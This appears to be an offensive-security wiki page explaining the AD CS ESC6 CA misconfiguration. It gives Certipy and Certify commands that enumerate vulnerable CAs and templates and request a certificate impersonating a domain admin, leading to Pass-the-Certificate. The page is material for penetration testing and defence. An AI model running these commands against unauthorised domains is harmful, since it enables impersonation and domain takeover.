CA configuration

Theory

In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on a dangerous CA setting (i.e. the EDITF_ATTRIBUTESUBJECTALTNAME2 flag). The escalation vector was dubbed ESC6.
When the flag is set on the CA, templates configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA)) and allowing low-priv users to enroll can be abused to authenticate as any other user/machine/admin.
The default User template checks all the template requirements stated above.
If the CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (admins tend to enable that flag without knowing the security implications), and the User template is enabled (which is very often), any user can escalate to domain admin.

Practice

UNIX-like
Windows
From UNIX-like systems, Certipy (Python) can be used to enumerate info about the CAs, including the "User Specified SAN" flag state which is an alias to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.
1
certipy find 'domain.local'/'user':'password'@'domain_controller'
2
grep "User Specified SAN" "DATE_Certipy.txt"
Copied!
By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.
Certipy's auto mode can also be used to automatically abuse a misconfigured CA.
The same "find" command can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.).
1
certipy find 'domain.local'/'user':'password'@'domain_controller'
Copied!
Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).
1
certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'certificate template' -alt 'domain admin'
Copied!
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.
From Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including the "UserSpecifiedSAN" flag state which refers to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.
1
Certify.exe cas
Copied!
If the flag is enabled on a CA, certify can then be used to find all enabled templates configured with EKUs allowing for authentication, and allowing low-priv users to enroll.
1
Certify.exe /enrolleeSuppliesSubject
2
Certify.exe /clientauth
Copied!
Once the right template is found (i.e. the default User template), a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).
1
Certify.exe request /ca:'domain\ca' /template:"Certificate template" /altname:"admin"
Copied!
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.

Resources

https://posts.specterops.io/certified-pre-owned-d95910965cd2
posts.specterops.io
Hidden Dangers: Certificate Subject Alternative Names (SANs)
Keyfactor
Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more!
Medium
Copy link